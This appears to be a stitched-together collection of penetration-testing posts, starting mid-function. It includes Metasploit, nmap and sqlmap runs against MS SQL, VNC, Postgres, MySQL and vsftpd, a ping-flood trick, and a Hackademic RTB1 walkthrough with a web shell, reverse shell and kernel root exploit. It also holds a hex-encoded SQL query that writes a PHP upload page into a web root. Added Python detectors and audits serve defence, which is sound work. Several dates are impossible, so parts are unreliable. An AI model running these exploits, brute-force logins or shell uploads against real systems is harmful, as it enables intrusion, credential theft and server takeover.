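    """Return (severity, reason) for a suspicious FileCreate event, else None."""
    if event.get("EventID") != 11:
        return None
    image = ntpath.basename(event.get("Image", "")).lower()
    target = event.get("TargetFilename", "").lower()
    ext = ntpath.splitext(target)[1]
    in_mof_dir = "\\system32\\wbem\\mof\\" in target
    # The spooler legitimately writes spool files under system32\spool;
    # anything else it creates directly under system32 is out of character.
    in_system32 = "\\system32\\" in target and "\\system32\\spool\\" not in target
    if image == "spoolsv.exe" and in_mof_dir:
        return ("high", "print spooler wrote into wbem\\mof (MS10-061 pattern)")
    if image == "spoolsv.exe" and in_system32 and ext in (".exe", ".dll"):
        return ("high", "print spooler wrote an executable into system32")
    if in_mof_dir and ext == ".mof":
        return ("medium", "new .mof queued for automatic WMI compilation; review")
    return None


def scan(lines):
    """Parse JSON event lines and return [(target, severity, reason)]."""
    findings = []
    for line in lines:
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            findings.append((event["TargetFilename"],) + verdict)
    return findings


if __name__ == "__main__":
    for target, severity, reason in scan(SAMPLE_EVENTS):
        print(f"{severity:6} {target}: {reason}")
```

The two "high" rules key on the process, not the file name, because the module randomises both names (pDeC6njEHgezu5.exe and 9Y3E56ufs7KWqm.mof above); the "medium" rule catches any other writer of wbem\mof so that a legitimate installer dropping a provider .mof is reviewed rather than ignored.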

----------------------------------------------------------------------------------

port 1433 - ms-sql-s (win)

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

----------------------------------------------------------------------------------

port 5900 - vnc (win/linux)

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run

[*] IP-Address:5900 - Starting VNC login sweep
[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''
[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC - [01/18] - , Authentication failed
[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'
[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3
[+] IP-Address:5900, VNC server password : "password"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2. Open vncviewer or tsclient

root@bt:~# vncviewer ip-address:5900

root@bt:~# tsclient

Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect

3. A password box will open; type in the password and press Enter.


----------------------------------------------------------------------------------

port 5432 - postgresql (linux)

root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST
Nmap scan report for Remote-IP-Address
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

MAC Address: 01:02:03:04:05:06 (Micky Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

msf > search PostgreSQL

Matching Modules
================

   Name                                         Disclosure Date          Rank       Description
   ----                                         ---------------          ----       -----------
   auxiliary/admin/postgres/postgres_readfile                            normal     PostgreSQL Server Generic Query
   auxiliary/admin/postgres/postgres_sql                                 normal     PostgreSQL Server Generic Query
   auxiliary/scanner/postgres/postgres_login                             normal     PostgreSQL Login Utility
   auxiliary/scanner/postgres/postgres_version                           normal     PostgreSQL Version Probe
   exploit/windows/postgres/postgres_payload    2009-04-10 00:00:00 UTC  excellent  PostgreSQL for Microsoft Windows Payload Execution

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts Remote-IP-Address
msf auxiliary(postgres_login) > exploit

[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''
[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''
[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''
[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''
[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'

[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

[*] Remote-IP-Address:5432 Postgres - Disconnected
[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'
[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'
[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'
[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'
[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'
[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'
[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'
[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'
[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'
[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'
[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'
[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >

root@bt:~# psql -h Remote-IP-Address -U postgres -W
Password for user postgres: postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=#
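The postgres_login run above got in with the default postgres:postgres pair because the server accepted password-based authentication for the superuser from the scanning host's network. As an added example (not part of the original post), here is a Python check over a constructed pg_hba.conf that flags the rules a hardening review would question: trust, cleartext password and md5 on wide network ranges in place of scram-sha-256 on a narrow ADDRESS.

```python
import ipaddress

# Constructed pg_hba.conf (not taken from the scanned host). The
# 0.0.0.0/0 md5 line is the kind of rule that lets a default
# postgres:postgres login work from anywhere on the network.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER   ADDRESS         METHOD
local   all       all                    peer
host    all       all    0.0.0.0/0       md5
host    all       all    ::/0            trust
host    app       app    10.20.30.0/24   password
host    all       all    127.0.0.1/32    scram-sha-256
"""

WEAK_METHODS = {"trust", "password", "md5"}
# A remote rule whose prefix is at or below this length counts as "wide".
WIDE_PREFIX = {4: 8, 6: 32}


def parse_pg_hba(text):
    """Return (type, database, user, address, method) per rule."""
    rules = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if not fields:
            continue
        if fields[0] == "local":            # local rules have no ADDRESS column
            rules.append((fields[0], fields[1], fields[2], None, fields[3]))
        elif fields[0] in ("host", "hostssl", "hostnossl"):
            rules.append(tuple(fields[:5]))
    return rules


def is_wide(address):
    """True for 'all' or a CIDR range broader than WIDE_PREFIX allows."""
    if address == "all":
        return True
    try:
        net = ipaddress.ip_network(address, strict=False)
    except ValueError:        # hostnames, samehost, samenet: not judged here
        return False
    return net.prefixlen <= WIDE_PREFIX[net.version]


def audit_pg_hba(text):
    """Return (address, method, reason) for each rule worth a review."""
    findings = []
    for typ, _db, user, addr, method in parse_pg_hba(text):
        if method == "trust":
            findings.append((addr, method, "no authentication at all"))
        elif typ != "local" and method in WEAK_METHODS and is_wide(addr):
            who = "every role" if user == "all" else f"role {user}"
            findings.append((addr, method, f"{who} reachable from a wide "
                             "range with password-only auth; use scram-sha-256 "
                             "and narrow ADDRESS"))
        elif method == "password":
            findings.append((addr, method, "password sent in cleartext"))
    return findings
```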

----------------------------------------------------------------------------------

port 25 - smtp

root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address

Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT
Nmap scan report for IP-Address
Host is up (0.00082s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
465/tcp closed smtps
587/tcp closed submission
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

----------------------------------------------------------------------------------

port 3306 - mysql (linux)

root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address

Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT
Nmap scan report for External-IP-Address
Host is up (0.00053s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-empty-password:
|_  root account has empty password
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds

root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

mysql> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.01 sec)

mysql> SELECT * FROM users;
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| user_id | first_name | last_name | user    | password                         | avatar                                               |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg   |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg    |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg   |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg  |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
5 rows in set (0.00 sec)

mysql>

mysql>

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.00 sec)

mysql> SELECT * FROM accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password | mysignature | is_admin |
+-----+----------+--------------+-----------------------------+----------+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.18 sec)

mysql>
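The two dumps above show two storage failures at once: dvwa.users holds unsalted MD5 (admin and smithy share 5f4dcc3b5aa765d61d8327deb882cf99, which is md5('password')), and owasp10.accounts holds cleartext passwords. As an added example that is not part of the original post, this Python audit takes rows constructed from those tables, classifies how each password is stored, flags shared hashes and well-known weak values, and shows what a salted PBKDF2 record and its verification look like instead.

```python
import hashlib
import hmac
import os
from collections import Counter

# Rows constructed from the two tables dumped above: (user, stored value).
DVWA_USERS = [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
              ("gordonb", "e99a18c428cb38d5f260853678922e03"),
              ("smithy", "5f4dcc3b5aa765d61d8327deb882cf99")]
OWASP10_ACCOUNTS = [("admin", "adminpass"), ("jeremy", "password"),
                    ("kevin", "42"), ("ed", "pentest")]
WEAK_PASSWORDS = ["password", "123456", "admin", "adminpass"]  # never accept


def classify(stored):
    """Guess the storage scheme from the stored value alone."""
    if stored.startswith("pbkdf2_sha256$"):
        return "pbkdf2"
    if len(stored) == 32 and all(c in "0123456789abcdef" for c in stored):
        return "unsalted-md5"
    return "plaintext"


def audit(rows):
    """Return {user: [issues]} for every row that needs attention."""
    issues = {}
    seen = Counter(stored for _, stored in rows)
    weak_md5 = {hashlib.md5(p.encode()).hexdigest(): p for p in WEAK_PASSWORDS}
    for user, stored in rows:
        found, scheme = [], classify(stored)
        if scheme == "plaintext":
            found.append("stored in cleartext")
            if stored in WEAK_PASSWORDS:
                found.append("well-known weak password")
        elif scheme == "unsalted-md5":
            found.append("unsalted MD5: fast to brute-force, no per-user salt")
            if seen[stored] > 1:  # identical hash => identical password, no salt
                found.append("hash shared with another account")
            if stored in weak_md5:
                found.append(f"matches md5({weak_md5[stored]!r})")
        if found:
            issues[user] = found
    return issues


def pbkdf2_record(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256 record: scheme$iterations$salt$hash."""
    salt = salt or os.urandom(16).hex()
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 salt.encode(), iterations).hex()
    return f"pbkdf2_sha256${iterations}${salt}${digest}"


def pbkdf2_verify(password, record):
    """Recompute from the record's own salt; compare in constant time."""
    _, iters, salt, digest = record.split("$")
    candidate = pbkdf2_record(password, salt, int(iters)).split("$")[3]
    return hmac.compare_digest(candidate, digest)
```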

----------------------------------------------------------------------------------

port 21 - FTP (linux)

root@bt:~# nmap -sC -sT -v IP-Address

PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

------------------------------------------------

msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts IP-Address

msf auxiliary(ftp_version) > run

[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

------------------------------------------------

msf auxiliary(ftp_version) > search vsFTPd

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution

------------------------------------------------

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > set rhost IP-Address

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000

ls -l

drwxr-xr-x 2 root root 4096 May 13 1421 bin
drwxr-xr-x 4 root root 1024 May 13 1421 boot
lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev
drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc
drwxr-xr-x 6 root root 4096 Apr 16 1421 home


Hogging Wifi Bandwidth using CMD.exe

Wednesday, 27 August 2014
> Press Win+R on the keyboard and type cmd
> Enter the command > ipconfig /all

> Then look for the line "DNS Servers" and note the number next to it

> Open a new CMD.exe and run the command > ping -L 1000 192.168.1.1 -t
(192.168.1.1 is the DNS server address) (1000 can be changed as you like)

> After pressing Enter, the bandwidth-hogging process will run, as in the picture below.

Thank you, hope this is useful.


Scanning for the Admin Login Page using Dirbuster

> Open a new terminal: #dirbuster
> Enter the target URL and port

> Choose the scanning type
 # List based brute force (uses a wordlist)
 # Pure brute force (runs directly)

> If you want to use a wordlist, choose it from the file system

> Browse to /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | Start

> If you are lucky, the location of the admin login page will be shown

That's all, thank you. Hope this is useful.




Solving Hackademic_RTB1

Monday, 25 August 2014
> First install the server in VirtualBox (VMware also works)

> Once done, open a new terminal and scan for its IP with the command
#netdiscover -i wlan0 -r 192.168.1.0/24 (wlan0 can be replaced with eth0; I'm on a wireless network, so I use wlan0)

> After the scan we find the IP is 192.168.1.104. Copy that IP into your browser's URL bar.

> Click the Hackademic.RTB1 heading, then click Uncategorized (just below it). Notice the URL changes to http://192.168.1.104/Hackademic_RTB1/?cat=1

> Next copy that URL, open your terminal and run sqlmap with the command
#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 --dbs
(result)
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress --tables
(result)
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns
(result)
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+

# sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users -C user_login,user_pass --dump
(result)
Database: wordpress
Table: wp_users
[6 entries]
+---------------------------------------------+--------------+
| user_pass                                   | user_login   |
+---------------------------------------------+--------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin)    | NickJames    |
| 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | MaxBucky     |
| 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | GeorgeMiller |
| 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | JasonKonnors |
| a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack    |
| b986448f0bb9e5e124ca91d3d650f52c            | JohnSmith    |
+---------------------------------------------+--------------+

========================================================================

Open a browser

Log in at http://192.168.1.104/Hackademic_RTB1/wp-admin

Log in as the super user GeorgeMiller | q1w2e3

In the dashboard, click OPTIONS > Miscellaneous > tick ALLOW UPLOAD > in the Miscellaneous field add the php extension

Click UPDATE OPTIONS

======================================================

Click the UPLOAD tab to upload the backdoor

Download the backdoor


1. Upload shell.php
Note its URL: /Hackademic_RTB1/wp-content/shell.php
Open the browser at http://99.99.99.7/Hackademic_RTB1/wp-content/shell.php
The shell is displayed

2. Upload bekonek.php to the folder /var/www/html/hekdemik/wp-conten/
then edit bekonek.php and replace the IP with the Kali Linux IP

3. In a terminal run nc -lvvp 443

4. Run bekonek.php from the browser

http://99.99.99.7/Hackademic_RTB1/wp-content/bekonek.php

5. In the terminal run whoami

id (enter)

uname -a (enter)

6. Upload exploit.c to wp-content

From the terminal, change into /var/www/html/Hackademic_RTB1/wp-content

Run the command sh-4.0$ gcc exploit.c -o sploit

A file named sploit will appear


7. Run the command

sh-4.0$ ./sploit
./sploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
id
uid=0(root) gid=0(root)

============================
Done. Hope this is useful
=======================================================




Uploading a Shell on Localhost

Saturday, 14 June 2014
Here I perform the injection on localhost. The first step is to open http://localhost/phpmyadmin/, then click the Query tab at the top left, type show variables and click Go, then look for basedir.

Note: no. 1 is the Query tab, no. 2 is typing show variables to find basedir

After clicking Go, the output shows the basedir found: C:AppServ\MySQL\

Note: the next directory is usually htdocs or www.

Once found, the next step is simply to create an upload page via SQL with the command


select 
0x3c3f706870206563686f20223c666f726d206d6574686f643d27
504f53542720656e63747970653d276d756c7469706172742f666f
726d2d64617461273e3c696e70757420747970653d2766696c652
7206e616d653d2766696c656c65272073697a653d273434273e3c
696e70757420747970653d277375626d6974273e3c2f666f726d3
e223b40636f707928245f46494c45535b2766696c656c65275d5b
27746d705f6e616d65275d2c245f46494c45535b2766696c656c6
5275d5b276e616d65275d293b3f3e 
into outfile 'c:/AppServ/www/upload.php'

Copy and paste the command above into the Query tab, see the picture below

Next, once the upload page has been created, upload your shell by clicking Browse (Telusuri) and Submit Query (Kirim Kueri).
Note: the shell I uploaded is called user.php; click the Open button, then the Submit Query button, and my shell is saved at http://localhost/user.php, so the shell has been uploaded to the victim's localhost.
Hopefully this adds to everyone's knowledge. Thank you.
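The query above only works because the MySQL account holds the FILE privilege and secure_file_priv does not confine where INTO OUTFILE may write, and the PHP is hidden inside a hex literal. As an added example that is not part of the original post, this Python snippet scans constructed MySQL general-log lines for INTO OUTFILE/DUMPFILE statements, decodes any 0x literal, and flags writes that land in a web-served directory, target a script extension, or carry PHP.

```python
import re

# Constructed MySQL general-log lines: time, thread id, command, statement.
# The post's long hex literal decodes to a PHP upload form; the stand-in
# here is the much shorter 0x... literal on the second line.
SAMPLE_LOG = """\
2014-06-14T10:01:02Z   13 Query  show variables
2014-06-14T10:01:40Z   13 Query  select 0x3c3f706870206563686f2031303b203f3e into outfile 'c:/AppServ/www/upload.php'
2014-06-14T10:02:10Z   14 Query  SELECT id, name FROM customers INTO OUTFILE '/var/lib/mysql-files/export.csv'
2014-06-14T10:02:30Z   15 Query  SELECT 0x414243 INTO DUMPFILE '/var/www/html/x.php'
2014-06-14T10:03:00Z   13 Query  select user from mysql.user
"""

# Directories served over HTTP; a file written here is reachable by a browser.
WEB_ROOTS = ("/var/www", "/srv/http", "c:/appserv/www", "c:/xampp/htdocs")
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")
OUTFILE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s+'([^']+)'", re.I)
HEX_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.I)


def decode_hex_literals(statement):
    """Decode every 0x... literal in a statement (odd digit counts are padded)."""
    return [bytes.fromhex(h if len(h) % 2 == 0 else "0" + h)
            for h in HEX_RE.findall(statement)]


def inspect_statement(statement):
    """Return a finding dict if the statement writes a file, else None."""
    m = OUTFILE_RE.search(statement)
    if not m:
        return None
    path = m.group(2).replace("\\", "/").lower()
    decoded = b"".join(decode_hex_literals(statement))
    reasons = []
    if path.startswith(WEB_ROOTS):
        reasons.append("writes into a web-served directory")
    if path.endswith(SCRIPT_EXTS):
        reasons.append("target has a server-side script extension")
    if b"<?php" in decoded or b"<?=" in decoded:
        reasons.append("hex literal decodes to PHP")
    return {"keyword": m.group(1).upper(), "path": m.group(2),
            "reasons": reasons, "severity": "high" if reasons else "info"}


def scan_general_log(text):
    """Return one finding per file-writing Query line in the log."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 3)          # time, thread, command, text
        if len(parts) < 4 or parts[2] != "Query":
            continue
        finding = inspect_statement(parts[3])
        if finding:
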